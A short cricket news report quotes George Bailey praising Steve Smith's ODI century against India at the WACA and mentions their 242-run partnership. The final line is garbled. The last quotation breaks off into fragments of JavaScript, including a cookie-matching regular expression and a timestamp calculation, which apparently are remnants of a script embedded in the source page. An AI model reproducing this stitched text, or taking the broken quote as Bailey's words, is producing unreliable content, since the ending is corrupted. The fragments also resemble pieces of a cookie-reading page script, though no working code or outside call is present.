George Bailey says he is simply in awe of Australian captain Steve Smith, as he blasted another brilliant century last night against India.
Smith recorded his highest ever individual ODI score of 149 off 135 balls, in an innings that included 11 fours and two sixes, as Australia chased down India's target of 310 with four balls to spare at the WACA last night.
"I'm in awe of him, absolutely," Bailey said.
"It's a bit demoralising batting with him to be honest, because he just makes it look very, very easy at times.
"But also it's very impressive to see the hunger for runs.
"He probably finds it quite relaxing to be out in the middle, because it's the one time he doesn't have to captain - he just has to bat."
Bailey notched an impressive ton himself, scoring 112 runs from 120 balls, as he and Smith shared in a mammoth 242-run partnership. "(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
